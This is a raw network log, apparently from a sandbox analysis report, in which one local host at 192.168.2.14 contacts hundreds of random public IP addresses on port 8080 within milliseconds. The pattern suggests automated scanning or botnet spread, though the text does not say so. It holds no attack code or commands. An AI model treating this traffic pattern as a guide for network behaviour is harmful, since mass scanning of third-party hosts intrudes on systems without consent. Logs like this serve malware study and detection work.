                                                        Feb 14, 2024 09:32:44.023600101 CET407478080192.168.2.1495.73.152.4
                                                        Feb 14, 2024 09:32:44.023603916 CET407478080192.168.2.1495.38.195.180
                                                        Feb 14, 2024 09:32:44.023605108 CET407478080192.168.2.1485.139.88.123
                                                        Feb 14, 2024 09:32:44.023610115 CET407478080192.168.2.1495.153.240.203
                                                        Feb 14, 2024 09:32:44.023616076 CET407478080192.168.2.1462.52.63.250
                                                        Feb 14, 2024 09:32:44.023624897 CET407478080192.168.2.1431.91.102.161
                                                        Feb 14, 2024 09:32:44.023631096 CET407478080192.168.2.1494.241.20.224
                                                        Feb 14, 2024 09:32:44.023636103 CET407478080192.168.2.1495.101.60.111
                                                        Feb 14, 2024 09:32:44.023636103 CET407478080192.168.2.1462.228.181.163
                                                        Feb 14, 2024 09:32:44.023641109 CET407478080192.168.2.1485.230.144.54
                                                        Feb 14, 2024 09:32:44.023649931 CET407478080192.168.2.1495.101.91.17
                                                        Feb 14, 2024 09:32:44.023649931 CET407478080192.168.2.1485.50.131.226
                                                        Feb 14, 2024 09:32:44.023649931 CET407478080192.168.2.1485.162.116.203
                                                        Feb 14, 2024 09:32:44.023649931 CET407478080192.168.2.1431.145.20.196
                                                        Feb 14, 2024 09:32:44.023654938 CET407478080192.168.2.1485.232.133.175
                                                        Feb 14, 2024 09:32:44.023659945 CET407478080192.168.2.1485.176.61.123
                                                        Feb 14, 2024 09:32:44.023659945 CET407478080192.168.2.1494.17.22.2
                                                        Feb 14, 2024 09:32:44.023664951 CET407478080192.168.2.1462.58.110.35
                                                        Feb 14, 2024 09:32:44.023665905 CET407478080192.168.2.1494.161.187.56
                                                        Feb 14, 2024 09:32:44.023667097 CET407478080192.168.2.1485.35.62.148
                                                        Feb 14, 2024 09:32:44.023686886 CET407478080192.168.2.1494.164.17.251
                                                        Feb 14, 2024 09:32:44.023696899 CET407478080192.168.2.1462.117.146.198
                                                        Feb 14, 2024 09:32:44.023703098 CET407478080192.168.2.1494.222.134.104
                                                        Feb 14, 2024 09:32:44.023704052 CET407478080192.168.2.1485.209.34.164
                                                        Feb 14, 2024 09:32:44.023704052 CET407478080192.168.2.1495.185.229.139
                                                        Feb 14, 2024 09:32:44.023704052 CET407478080192.168.2.1495.91.13.78
                                                        Feb 14, 2024 09:32:44.023706913 CET407478080192.168.2.1431.150.49.10
                                                        Feb 14, 2024 09:32:44.023706913 CET407478080192.168.2.1494.16.211.110
                                                        Feb 14, 2024 09:32:44.023720026 CET407478080192.168.2.1431.24.96.21
                                                        Feb 14, 2024 09:32:44.023720026 CET407478080192.168.2.1495.22.92.253
                                                        Feb 14, 2024 09:32:44.023721933 CET407478080192.168.2.1431.34.34.239
                                                        Feb 14, 2024 09:32:44.023734093 CET407478080192.168.2.1495.47.239.44
                                                        Feb 14, 2024 09:32:44.023745060 CET407478080192.168.2.1494.130.189.52
                                                        Feb 14, 2024 09:32:44.023746014 CET407478080192.168.2.1431.155.154.51
                                                        Feb 14, 2024 09:32:44.023746014 CET407478080192.168.2.1462.10.135.114
                                                        Feb 14, 2024 09:32:44.023747921 CET407478080192.168.2.1495.215.6.87
                                                        Feb 14, 2024 09:32:44.023751020 CET407478080192.168.2.1495.177.19.145
                                                        Feb 14, 2024 09:32:44.023756027 CET407478080192.168.2.1462.238.241.72
                                                        Feb 14, 2024 09:32:44.023760080 CET407478080192.168.2.1462.31.191.55
                                                        Feb 14, 2024 09:32:44.023761988 CET407478080192.168.2.1485.174.181.83
                                                        Feb 14, 2024 09:32:44.023761988 CET407478080192.168.2.1431.119.133.229
                                                        Feb 14, 2024 09:32:44.023780107 CET407478080192.168.2.1462.43.11.86
                                                        Feb 14, 2024 09:32:44.023783922 CET407478080192.168.2.1495.80.253.168
                                                        Feb 14, 2024 09:32:44.023783922 CET407478080192.168.2.1431.214.41.204
                                                        Feb 14, 2024 09:32:44.023788929 CET407478080192.168.2.1495.97.253.21
                                                        Feb 14, 2024 09:32:44.023788929 CET407478080192.168.2.1485.67.119.174
                                                        Feb 14, 2024 09:32:44.023788929 CET407478080192.168.2.1494.1.63.95
                                                        Feb 14, 2024 09:32:44.023788929 CET407478080192.168.2.1431.158.71.153
                                                        Feb 14, 2024 09:32:44.023797035 CET407478080192.168.2.1431.248.166.34
                                                        Feb 14, 2024 09:32:44.023812056 CET407478080192.168.2.1494.244.10.155
                                                        Feb 14, 2024 09:32:44.023823977 CET407478080192.168.2.1494.16.116.2
                                                        Feb 14, 2024 09:32:44.023823977 CET407478080192.168.2.1431.49.2.51
                                                        Feb 14, 2024 09:32:44.023823977 CET407478080192.168.2.1462.98.97.25
                                                        Feb 14, 2024 09:32:44.023823977 CET407478080192.168.2.1431.227.213.227
                                                        Feb 14, 2024 09:32:44.023823977 CET407478080192.168.2.1495.234.46.44
                                                        Feb 14, 2024 09:32:44.023834944 CET407478080192.168.2.1495.125.252.221
                                                        Feb 14, 2024 09:32:44.023834944 CET407478080192.168.2.1431.137.239.33
                                                        Feb 14, 2024 09:32:44.023835897 CET407478080192.168.2.1462.239.185.184
                                                        Feb 14, 2024 09:32:44.023835897 CET407478080192.168.2.1485.109.234.155
                                                        Feb 14, 2024 09:32:44.023837090 CET407478080192.168.2.1431.5.221.122
                                                        Feb 14, 2024 09:32:44.023855925 CET407478080192.168.2.1495.132.118.212
                                                        Feb 14, 2024 09:32:44.023859978 CET407478080192.168.2.1462.188.4.237
                                                        Feb 14, 2024 09:32:44.023859978 CET407478080192.168.2.1485.110.249.143
                                                        Feb 14, 2024 09:32:44.023859978 CET407478080192.168.2.1462.194.131.230
                                                        Feb 14, 2024 09:32:44.023885012 CET407478080192.168.2.1495.251.105.92
                                                        Feb 14, 2024 09:32:44.023885965 CET407478080192.168.2.1485.155.155.153
                                                        Feb 14, 2024 09:32:44.023885012 CET407478080192.168.2.1485.82.248.33
                                                        Feb 14, 2024 09:32:44.023885965 CET407478080192.168.2.1462.99.30.151
                                                        Feb 14, 2024 09:32:44.023897886 CET407478080192.168.2.1431.7.136.50
                                                        Feb 14, 2024 09:32:44.023905039 CET407478080192.168.2.1462.194.22.43
                                                        Feb 14, 2024 09:32:44.023905039 CET407478080192.168.2.1494.233.226.125
                                                        Feb 14, 2024 09:32:44.023922920 CET407478080192.168.2.1431.150.105.197
                                                        Feb 14, 2024 09:32:44.023926020 CET407478080192.168.2.1462.21.13.8
                                                        Feb 14, 2024 09:32:44.023929119 CET407478080192.168.2.1431.83.55.171
                                                        Feb 14, 2024 09:32:44.023936033 CET407478080192.168.2.1494.114.29.116
                                                        Feb 14, 2024 09:32:44.023936033 CET407478080192.168.2.1462.51.112.15
                                                        Feb 14, 2024 09:32:44.023941040 CET407478080192.168.2.1494.62.43.93
                                                        Feb 14, 2024 09:32:44.023941040 CET407478080192.168.2.1431.136.68.206
                                                        Feb 14, 2024 09:32:44.023942947 CET407478080192.168.2.1495.144.211.200
                                                        Feb 14, 2024 09:32:44.023942947 CET407478080192.168.2.1485.223.12.207
                                                        Feb 14, 2024 09:32:44.023957014 CET407478080192.168.2.1495.165.78.206
                                                        Feb 14, 2024 09:32:44.023962021 CET407478080192.168.2.1462.247.20.247
                                                        Feb 14, 2024 09:32:44.023968935 CET407478080192.168.2.1485.26.200.76
                                                        Feb 14, 2024 09:32:44.023977995 CET407478080192.168.2.1494.230.234.57
                                                        Feb 14, 2024 09:32:44.023977995 CET407478080192.168.2.1462.9.81.234
                                                        Feb 14, 2024 09:32:44.023983002 CET407478080192.168.2.1495.173.154.46
                                                        Feb 14, 2024 09:32:44.023983955 CET407478080192.168.2.1495.4.13.17
                                                        Feb 14, 2024 09:32:44.023994923 CET407478080192.168.2.1485.159.89.39
                                                        Feb 14, 2024 09:32:44.024014950 CET407478080192.168.2.1431.177.49.74
                                                        Feb 14, 2024 09:32:44.024014950 CET407478080192.168.2.1485.40.225.100
                                                        Feb 14, 2024 09:32:44.024014950 CET407478080192.168.2.1485.17.79.154
                                                        Feb 14, 2024 09:32:44.024020910 CET407478080192.168.2.1431.226.250.127
                                                        Feb 14, 2024 09:32:44.024020910 CET407478080192.168.2.1485.254.189.242
                                                        Feb 14, 2024 09:32:44.024024010 CET407478080192.168.2.1495.115.236.49
                                                        Feb 14, 2024 09:32:44.024022102 CET407478080192.168.2.1495.164.84.250
                                                        Feb 14, 2024 09:32:44.024024010 CET407478080192.168.2.1485.160.145.60
                                                        Feb 14, 2024 09:32:44.024044991 CET407478080192.168.2.1431.44.15.210
                                                        Feb 14, 2024 09:32:44.024044991 CET407478080192.168.2.1431.4.237.152
                                                        Feb 14, 2024 09:32:44.024046898 CET407478080192.168.2.1485.223.249.160
                                                        Feb 14, 2024 09:32:44.024048090 CET407478080192.168.2.1485.167.168.32
                                                        Feb 14, 2024 09:32:44.024048090 CET407478080192.168.2.1494.177.232.231
                                                        Feb 14, 2024 09:32:44.024049044 CET407478080192.168.2.1431.99.87.63
                                                        Feb 14, 2024 09:32:44.024049044 CET407478080192.168.2.1431.87.214.139
                                                        Feb 14, 2024 09:32:44.024070024 CET407478080192.168.2.1485.9.23.73
                                                        Feb 14, 2024 09:32:44.024071932 CET407478080192.168.2.1495.67.33.35
                                                        Feb 14, 2024 09:32:44.024075031 CET407478080192.168.2.1462.191.246.145
                                                        Feb 14, 2024 09:32:44.024075031 CET407478080192.168.2.1462.153.91.27
                                                        Feb 14, 2024 09:32:44.024079084 CET407478080192.168.2.1462.176.110.6
                                                        Feb 14, 2024 09:32:44.024086952 CET407478080192.168.2.1495.1.237.194
                                                        Feb 14, 2024 09:32:44.024086952 CET407478080192.168.2.1462.185.217.131
                                                        Feb 14, 2024 09:32:44.024106979 CET407478080192.168.2.1485.190.111.56
                                                        Feb 14, 2024 09:32:44.024107933 CET407478080192.168.2.1494.255.2.101
                                                        Feb 14, 2024 09:32:44.024108887 CET407478080192.168.2.1431.34.142.133
                                                        Feb 14, 2024 09:32:44.024107933 CET407478080192.168.2.1485.112.241.60
                                                        Feb 14, 2024 09:32:44.024135113 CET407478080192.168.2.1462.89.217.40
                                                        Feb 14, 2024 09:32:44.024141073 CET407478080192.168.2.1494.215.83.181
                                                        Feb 14, 2024 09:32:44.024141073 CET407478080192.168.2.1485.107.171.199
                                                        Feb 14, 2024 09:32:44.024141073 CET407478080192.168.2.1494.173.4.68
                                                        Feb 14, 2024 09:32:44.024141073 CET407478080192.168.2.1431.189.50.170
                                                        Feb 14, 2024 09:32:44.024144888 CET407478080192.168.2.1462.129.182.205
                                                        Feb 14, 2024 09:32:44.024152994 CET407478080192.168.2.1431.105.255.53
                                                        Feb 14, 2024 09:32:44.024159908 CET407478080192.168.2.1431.211.57.173
                                                        Feb 14, 2024 09:32:44.024159908 CET407478080192.168.2.1431.9.59.31
                                                        Feb 14, 2024 09:32:44.024167061 CET407478080192.168.2.1462.147.237.136
                                                        Feb 14, 2024 09:32:44.024167061 CET407478080192.168.2.1495.124.2.250
                                                        Feb 14, 2024 09:32:44.024168968 CET407478080192.168.2.1431.100.127.192
                                                        Feb 14, 2024 09:32:44.024177074 CET407478080192.168.2.1462.173.230.209
                                                        Feb 14, 2024 09:32:44.024190903 CET407478080192.168.2.1494.215.91.38
                                                        Feb 14, 2024 09:32:44.024195910 CET407478080192.168.2.1462.118.46.121
                                                        Feb 14, 2024 09:32:44.024195910 CET407478080192.168.2.1494.173.33.116
                                                        Feb 14, 2024 09:32:44.024229050 CET407478080192.168.2.1431.61.254.74
                                                        Feb 14, 2024 09:32:44.024229050 CET407478080192.168.2.1494.147.244.77
                                                        Feb 14, 2024 09:32:44.024234056 CET407478080192.168.2.1431.160.214.234
                                                        Feb 14, 2024 09:32:44.024234056 CET407478080192.168.2.1495.143.213.73
                                                        Feb 14, 2024 09:32:44.024236917 CET407478080192.168.2.1431.43.204.59
                                                        Feb 14, 2024 09:32:44.024245024 CET407478080192.168.2.1462.169.25.213
                                                        Feb 14, 2024 09:32:44.024244070 CET407478080192.168.2.1462.154.138.72
                                                        Feb 14, 2024 09:32:44.024244070 CET407478080192.168.2.1485.97.4.206
                                                        Feb 14, 2024 09:32:44.024246931 CET407478080192.168.2.1495.148.80.195
                                                        Feb 14, 2024 09:32:44.024245024 CET407478080192.168.2.1431.119.203.229
                                                        Feb 14, 2024 09:32:44.024246931 CET407478080192.168.2.1495.24.207.113
                                                        Feb 14, 2024 09:32:44.024246931 CET407478080192.168.2.1485.24.46.193
                                                        Feb 14, 2024 09:32:44.024246931 CET407478080192.168.2.1431.140.154.228
                                                        Feb 14, 2024 09:32:44.024250984 CET407478080192.168.2.1462.62.104.159
                                                        Feb 14, 2024 09:32:44.024246931 CET407478080192.168.2.1495.208.227.129
                                                        Feb 14, 2024 09:32:44.024250984 CET407478080192.168.2.1495.60.138.235
                                                        Feb 14, 2024 09:32:44.024246931 CET407478080192.168.2.1494.50.7.54
                                                        Feb 14, 2024 09:32:44.024250984 CET407478080192.168.2.1485.125.185.198
                                                        Feb 14, 2024 09:32:44.024266005 CET407478080192.168.2.1462.150.111.38
                                                        Feb 14, 2024 09:32:44.024281025 CET407478080192.168.2.1431.12.70.28
                                                        Feb 14, 2024 09:32:44.024281979 CET407478080192.168.2.1485.216.23.200
                                                        Feb 14, 2024 09:32:44.024281979 CET407478080192.168.2.1431.165.89.61
                                                        Feb 14, 2024 09:32:44.024281025 CET407478080192.168.2.1485.174.217.118
                                                        Feb 14, 2024 09:32:44.024282932 CET407478080192.168.2.1431.154.47.15
                                                        Feb 14, 2024 09:32:44.024281025 CET407478080192.168.2.1485.131.136.230
                                                        Feb 14, 2024 09:32:44.024281025 CET407478080192.168.2.1431.197.238.19
                                                        Feb 14, 2024 09:32:44.024296045 CET407478080192.168.2.1495.149.4.11
                                                        Feb 14, 2024 09:32:44.024296045 CET407478080192.168.2.1494.141.237.212
                                                        Feb 14, 2024 09:32:44.024306059 CET407478080192.168.2.1494.39.230.77
                                                        Feb 14, 2024 09:32:44.024306059 CET407478080192.168.2.1494.175.91.187
                                                        Feb 14, 2024 09:32:44.024310112 CET407478080192.168.2.1485.16.212.61
                                                        Feb 14, 2024 09:32:44.024310112 CET407478080192.168.2.1485.133.247.64
                                                        Feb 14, 2024 09:32:44.024310112 CET407478080192.168.2.1431.110.97.49
                                                        Feb 14, 2024 09:32:44.024312973 CET407478080192.168.2.1494.86.29.9
                                                        Feb 14, 2024 09:32:44.024312973 CET407478080192.168.2.1462.150.251.144
                                                        Feb 14, 2024 09:32:44.024318933 CET407478080192.168.2.1485.91.143.222
                                                        Feb 14, 2024 09:32:44.024331093 CET407478080192.168.2.1494.235.84.158
                                                        Feb 14, 2024 09:32:44.024339914 CET407478080192.168.2.1431.41.81.254
                                                        Feb 14, 2024 09:32:44.024339914 CET407478080192.168.2.1462.107.120.62
                                                        Feb 14, 2024 09:32:44.024346113 CET407478080192.168.2.1495.81.198.192
                                                        Feb 14, 2024 09:32:44.024346113 CET407478080192.168.2.1494.174.228.129
                                                        Feb 14, 2024 09:32:44.024353027 CET407478080192.168.2.1485.242.189.48
                                                        Feb 14, 2024 09:32:44.024355888 CET407478080192.168.2.1495.156.203.201
                                                        Feb 14, 2024 09:32:44.024357080 CET407478080192.168.2.1485.126.225.159
                                                        Feb 14, 2024 09:32:44.024357080 CET407478080192.168.2.1485.150.250.112
                                                        Feb 14, 2024 09:32:44.024359941 CET407478080192.168.2.1431.183.174.247
                                                        Feb 14, 2024 09:32:44.024357080 CET407478080192.168.2.1494.94.25.78
                                                        Feb 14, 2024 09:32:44.024358034 CET407478080192.168.2.1485.239.168.221
                                                        Feb 14, 2024 09:32:44.024369001 CET407478080192.168.2.1494.133.177.20
                                                        Feb 14, 2024 09:32:44.024372101 CET407478080192.168.2.1495.141.207.75
                                                        Feb 14, 2024 09:32:44.024379015 CET407478080192.168.2.1485.137.134.53
                                                        Feb 14, 2024 09:32:44.024384975 CET407478080192.168.2.1494.41.127.115
                                                        Feb 14, 2024 09:32:44.024393082 CET407478080192.168.2.1431.247.156.33
                                                        Feb 14, 2024 09:32:44.024399996 CET407478080192.168.2.1431.247.164.93
                                                        Feb 14, 2024 09:32:44.024414062 CET407478080192.168.2.1485.214.44.144
                                                        Feb 14, 2024 09:32:44.024414062 CET407478080192.168.2.1485.108.184.14
                                                        Feb 14, 2024 09:32:44.024422884 CET407478080192.168.2.1485.168.146.200
                                                        Feb 14, 2024 09:32:44.024424076 CET407478080192.168.2.1495.241.87.117
                                                        Feb 14, 2024 09:32:44.024422884 CET407478080192.168.2.1431.55.38.97
                                                        Feb 14, 2024 09:32:44.024424076 CET407478080192.168.2.1462.90.39.234
                                                        Feb 14, 2024 09:32:44.024425030 CET407478080192.168.2.1495.191.104.137
                                                        Feb 14, 2024 09:32:44.024430990 CET407478080192.168.2.1431.130.160.165
                                                        Feb 14, 2024 09:32:44.024434090 CET407478080192.168.2.1462.220.251.149
                                                        Feb 14, 2024 09:32:44.024450064 CET407478080192.168.2.1485.92.92.239
                                                        Feb 14, 2024 09:32:44.024462938 CET407478080192.168.2.1462.250.15.250
                                                        Feb 14, 2024 09:32:44.024466038 CET407478080192.168.2.1494.208.79.218
                                                        Feb 14, 2024 09:32:44.024473906 CET407478080192.168.2.1462.209.114.41
                                                        Feb 14, 2024 09:32:44.024473906 CET407478080192.168.2.1485.226.226.49
                                                        Feb 14, 2024 09:32:44.024473906 CET407478080192.168.2.1494.96.150.113
                                                        Feb 14, 2024 09:32:44.024480104 CET407478080192.168.2.1485.36.243.148
                                                        Feb 14, 2024 09:32:44.024482012 CET407478080192.168.2.1462.124.100.174
                                                        Feb 14, 2024 09:32:44.024490118 CET407478080192.168.2.1431.170.53.168
                                                        Feb 14, 2024 09:32:44.024490118 CET407478080192.168.2.1462.214.115.73
                                                        Feb 14, 2024 09:32:44.024490118 CET407478080192.168.2.1485.135.157.166
                                                        Feb 14, 2024 09:32:44.024496078 CET407478080192.168.2.1495.83.118.216
                                                        Feb 14, 2024 09:32:44.024502039 CET407478080192.168.2.1485.136.185.98
                                                        Feb 14, 2024 09:32:44.024502039 CET407478080192.168.2.1495.96.149.207
                                                        Feb 14, 2024 09:32:44.024502039 CET407478080192.168.2.1494.187.238.83
                                                        Feb 14, 2024 09:32:44.024509907 CET407478080192.168.2.1431.33.200.77
                                                        Feb 14, 2024 09:32:44.024511099 CET407478080192.168.2.1494.106.188.55
                                                        Feb 14, 2024 09:32:44.024512053 CET407478080192.168.2.1495.169.97.28
                                                        Feb 14, 2024 09:32:44.024518967 CET407478080192.168.2.1485.252.230.64
                                                        Feb 14, 2024 09:32:44.024529934 CET407478080192.168.2.1462.37.227.248
                                                        Feb 14, 2024 09:32:44.024537086 CET407478080192.168.2.1495.216.178.231
                                                        Feb 14, 2024 09:32:44.024539948 CET407478080192.168.2.1485.148.67.249
                                                        Feb 14, 2024 09:32:44.024545908 CET407478080192.168.2.1431.74.99.60
                                                        Feb 14, 2024 09:32:44.024545908 CET407478080192.168.2.1495.10.135.50
                                                        Feb 14, 2024 09:32:44.024548054 CET407478080192.168.2.1462.4.236.145
                                                        Feb 14, 2024 09:32:44.024550915 CET407478080192.168.2.1431.40.203.137
                                                        Feb 14, 2024 09:32:44.024550915 CET407478080192.168.2.1431.158.199.249
                                                        Feb 14, 2024 09:32:44.024550915 CET407478080192.168.2.1431.143.72.102
                                                        Feb 14, 2024 09:32:44.024557114 CET407478080192.168.2.1494.13.11.65
                                                        Feb 14, 2024 09:32:44.024574995 CET407478080192.168.2.1431.209.59.241
                                                        Feb 14, 2024 09:32:44.024579048 CET407478080192.168.2.1485.7.116.42
                                                        Feb 14, 2024 09:32:44.024580956 CET407478080192.168.2.1462.237.214.121
                                                        Feb 14, 2024 09:32:44.024580002 CET407478080192.168.2.1495.96.188.243
                                                        Feb 14, 2024 09:32:44.024595022 CET407478080192.168.2.1431.9.59.200
                                                        Feb 14, 2024 09:32:44.024604082 CET407478080192.168.2.1462.107.144.30
                                                        Feb 14, 2024 09:32:44.024604082 CET407478080192.168.2.1431.162.115.179
                                                        Feb 14, 2024 09:32:44.024609089 CET407478080192.168.2.1485.73.18.226
                                                        Feb 14, 2024 09:32:44.024609089 CET407478080192.168.2.1494.36.178.136
                                                        Feb 14, 2024 09:32:44.024609089 CET407478080192.168.2.1494.35.41.166
                                                        Feb 14, 2024 09:32:44.024629116 CET407478080192.168.2.1495.172.1.154
                                                        Feb 14, 2024 09:32:44.024630070 CET407478080192.168.2.1431.75.116.169
                                                        Feb 14, 2024 09:32:44.024629116 CET407478080192.168.2.1494.246.9.253
                                                        Feb 14, 2024 09:32:44.024630070 CET407478080192.168.2.1431.242.246.159
                                                        Feb 14, 2024 09:32:44.024641991 CET407478080192.168.2.1431.4.67.105
                                                        Feb 14, 2024 09:32:44.024646997 CET407478080192.168.2.1495.115.178.181
                                                        Feb 14, 2024 09:32:44.024658918 CET407478080192.168.2.1431.23.16.83
                                                        Feb 14, 2024 09:32:44.024658918 CET407478080192.168.2.1495.76.52.137
                                                        Feb 14, 2024 09:32:44.024671078 CET407478080192.168.2.1485.234.106.163
                                                        Feb 14, 2024 09:32:44.024671078 CET407478080192.168.2.1494.80.219.212
                                                        Feb 14, 2024 09:32:44.024672031 CET407478080192.168.2.1431.23.154.154
                                                        Feb 14, 2024 09:32:44.024674892 CET407478080192.168.2.1495.101.25.248
                                                        Feb 14, 2024 09:32:44.024677038 CET407478080192.168.2.1431.200.136.24
                                                        Feb 14, 2024 09:32:44.024698019 CET407478080192.168.2.1431.158.192.247
                                                        Feb 14, 2024 09:32:44.024698019 CET407478080192.168.2.1494.63.207.107
                                                        Feb 14, 2024 09:32:44.024709940 CET407478080192.168.2.1431.82.15.48
                                                        Feb 14, 2024 09:32:44.024709940 CET407478080192.168.2.1462.195.203.63
                                                        Feb 14, 2024 09:32:44.024710894 CET407478080192.168.2.1485.82.58.42
                                                        Feb 14, 2024 09:32:44.024709940 CET407478080192.168.2.1462.142.48.243
                                                        Feb 14, 2024 09:32:44.024720907 CET407478080192.168.2.1462.22.184.189
                                                        Feb 14, 2024 09:32:44.024722099 CET407478080192.168.2.1431.127.132.178
                                                        Feb 14, 2024 09:32:44.024736881 CET407478080192.168.2.1462.88.98.63
                                                        Feb 14, 2024 09:32:44.024736881 CET407478080192.168.2.1495.140.120.136
                                                        Feb 14, 2024 09:32:44.024739981 CET407478080192.168.2.1462.27.107.158
                                                        Feb 14, 2024 09:32:44.024739981 CET407478080192.168.2.1494.80.140.101
                                                        Feb 14, 2024 09:32:44.024744987 CET407478080192.168.2.1431.159.63.115
                                                        Feb 14, 2024 09:32:44.024744987 CET407478080192.168.2.1462.121.201.73
                                                        Feb 14, 2024 09:32:44.024750948 CET407478080192.168.2.1494.106.34.149
                                                        Feb 14, 2024 09:32:44.024760962 CET407478080192.168.2.1495.157.59.202
                                                        Feb 14, 2024 09:32:44.024763107 CET407478080192.168.2.1485.216.64.188
                                                        Feb 14, 2024 09:32:44.024760962 CET407478080192.168.2.1494.98.176.220
                                                        Feb 14, 2024 09:32:44.024763107 CET407478080192.168.2.1431.144.78.38
                                                        Feb 14, 2024 09:32:44.024780989 CET407478080192.168.2.1431.52.243.206
                                                        Feb 14, 2024 09:32:44.024789095 CET407478080192.168.2.1495.221.1.6
                                                        Feb 14, 2024 09:32:44.024792910 CET407478080192.168.2.1462.236.114.54
                                                        Feb 14, 2024 09:32:44.024795055 CET407478080192.168.2.1495.66.199.130
                                                        Feb 14, 2024 09:32:44.024805069 CET407478080192.168.2.1485.216.95.140
                                                        Feb 14, 2024 09:32:44.024805069 CET407478080192.168.2.1485.67.137.7
                                                        Feb 14, 2024 09:32:44.024805069 CET407478080192.168.2.1485.231.153.104
                                                        Feb 14, 2024 09:32:44.024817944 CET407478080192.168.2.1462.18.252.76
                                                        Feb 14, 2024 09:32:44.024822950 CET407478080192.168.2.1485.35.162.240
                                                        Feb 14, 2024 09:32:44.024828911 CET407478080192.168.2.1495.81.250.239
                                                        Feb 14, 2024 09:32:44.024828911 CET407478080192.168.2.1431.86.105.78
                                                        Feb 14, 2024 09:32:44.024828911 CET407478080192.168.2.1494.101.249.147
                                                        Feb 14, 2024 09:32:44.024828911 CET407478080192.168.2.1485.91.119.213
                                                        Feb 14, 2024 09:32:44.024832964 CET407478080192.168.2.1495.189.194.172
                                                        Feb 14, 2024 09:32:44.024837017 CET407478080192.168.2.1462.229.70.127
                                                        Feb 14, 2024 09:32:44.024837971 CET407478080192.168.2.1485.252.232.46
                                                        Feb 14, 2024 09:32:44.024843931 CET407478080192.168.2.1495.182.22.6
                                                        Feb 14, 2024 09:32:44.024843931 CET407478080192.168.2.1494.1.159.5
                                                        Feb 14, 2024 09:32:44.024847984 CET407478080192.168.2.1485.62.67.242
                                                        Feb 14, 2024 09:32:44.024852037 CET407478080192.168.2.1462.221.240.204
                                                        Feb 14, 2024 09:32:44.024852037 CET407478080192.168.2.1485.234.20.85
                                                        Feb 14, 2024 09:32:44.024878025 CET407478080192.168.2.1494.140.58.187
                                                        Feb 14, 2024 09:32:44.024878025 CET407478080192.168.2.1431.8.122.106
                                                        Feb 14, 2024 09:32:44.024878025 CET407478080192.168.2.1495.203.189.188
                                                        Feb 14, 2024 09:32:44.024880886 CET407478080192.168.2.1494.130.148.145
                                                        Feb 14, 2024 09:32:44.024880886 CET407478080192.168.2.1495.116.203.205
                                                        Feb 14, 2024 09:32:44.024888039 CET407478080192.168.2.1485.52.230.243
                                                        Feb 14, 2024 09:32:44.024888039 CET407478080192.168.2.1431.248.163.108
                                                        Feb 14, 2024 09:32:44.024892092 CET407478080192.168.2.1495.98.118.93
                                                        Feb 14, 2024 09:32:44.024892092 CET407478080192.168.2.1494.196.212.111
                                                        Feb 14, 2024 09:32:44.024894953 CET407478080192.168.2.1462.145.27.55
                                                        Feb 14, 2024 09:32:44.024894953 CET407478080192.168.2.1494.114.244.37
                                                        Feb 14, 2024 09:32:44.024904966 CET407478080192.168.2.1495.24.239.121
                                                        Feb 14, 2024 09:32:44.024904966 CET407478080192.168.2.1462.122.102.41
                                                        Feb 14, 2024 09:32:44.024905920 CET407478080192.168.2.1431.56.226.155
                                                        Feb 14, 2024 09:32:44.024905920 CET407478080192.168.2.1462.133.119.41
                                                        Feb 14, 2024 09:32:44.024924040 CET407478080192.168.2.1462.119.24.108
                                                        Feb 14, 2024 09:32:44.024928093 CET407478080192.168.2.1431.239.73.9
                                                        Feb 14, 2024 09:32:44.024943113 CET407478080192.168.2.1462.81.136.202
                                                        Feb 14, 2024 09:32:44.024943113 CET407478080192.168.2.1495.183.97.11
                                                        Feb 14, 2024 09:32:44.024943113 CET407478080192.168.2.1485.215.185.182
                                                        Feb 14, 2024 09:32:44.024943113 CET407478080192.168.2.1431.200.222.31
                                                        Feb 14, 2024 09:32:44.024947882 CET407478080192.168.2.1431.204.104.69
                                                        Feb 14, 2024 09:32:44.024950027 CET407478080192.168.2.1495.195.191.28
                                                        Feb 14, 2024 09:32:44.024961948 CET407478080192.168.2.1485.132.254.143
                                                        Feb 14, 2024 09:32:44.024962902 CET407478080192.168.2.1431.26.23.178
                                                        Feb 14, 2024 09:32:44.024962902 CET407478080192.168.2.1494.164.216.67
                                                        Feb 14, 2024 09:32:44.024974108 CET407478080192.168.2.1495.149.211.126
                                                        Feb 14, 2024 09:32:44.024974108 CET407478080192.168.2.1431.244.180.21
                                                        Feb 14, 2024 09:32:44.024977922 CET407478080192.168.2.1494.117.209.242
                                                        Feb 14, 2024 09:32:44.024986982 CET407478080192.168.2.1431.12.172.225
                                                        Feb 14, 2024 09:32:44.024986982 CET407478080192.168.2.1494.145.189.8
                                                        Feb 14, 2024 09:32:44.024988890 CET407478080192.168.2.1462.221.103.100
                                                        Feb 14, 2024 09:32:44.024991035 CET407478080192.168.2.1462.154.116.182
                                                        Feb 14, 2024 09:32:44.024991035 CET407478080192.168.2.1495.248.232.70
                                                        Feb 14, 2024 09:32:44.024996042 CET407478080192.168.2.1485.126.19.214
                                                        Feb 14, 2024 09:32:44.024996996 CET407478080192.168.2.1431.95.196.68
                                                        Feb 14, 2024 09:32:44.024996042 CET407478080192.168.2.1431.40.122.0
                                                        Feb 14, 2024 09:32:44.025012970 CET407478080192.168.2.1431.74.104.199
                                                        Feb 14, 2024 09:32:44.025012970 CET407478080192.168.2.1431.12.180.138
                                                        Feb 14, 2024 09:32:44.025015116 CET407478080192.168.2.1495.187.154.82
                                                        Feb 14, 2024 09:32:44.025016069 CET407478080192.168.2.1495.238.245.109
                                                        Feb 14, 2024 09:32:44.025016069 CET407478080192.168.2.1431.179.116.252
                                                        Feb 14, 2024 09:32:44.025026083 CET407478080192.168.2.1485.136.231.86
                                                        Feb 14, 2024 09:32:44.025031090 CET407478080192.168.2.1431.56.254.180
                                                        Feb 14, 2024 09:32:44.025031090 CET407478080192.168.2.1494.75.19.155
                                                        Feb 14, 2024 09:32:44.025032997 CET407478080192.168.2.1485.96.215.54
                                                        Feb 14, 2024 09:32:44.025041103 CET407478080192.168.2.1462.193.152.86
                                                        Feb 14, 2024 09:32:44.025052071 CET407478080192.168.2.1485.189.24.231
                                                        Feb 14, 2024 09:32:44.025052071 CET407478080192.168.2.1462.54.203.23
                                                        Feb 14, 2024 09:32:44.025065899 CET407478080192.168.2.1495.95.36.9
                                                        Feb 14, 2024 09:32:44.025069952 CET407478080192.168.2.1495.130.109.5
                                                        Feb 14, 2024 09:32:44.025069952 CET407478080192.168.2.1494.21.62.22
                                                        Feb 14, 2024 09:32:44.025069952 CET407478080192.168.2.1495.240.65.62
                                                        Feb 14, 2024 09:32:44.025075912 CET407478080192.168.2.1431.128.93.121
                                                        Feb 14, 2024 09:32:44.025085926 CET407478080192.168.2.1494.118.248.242
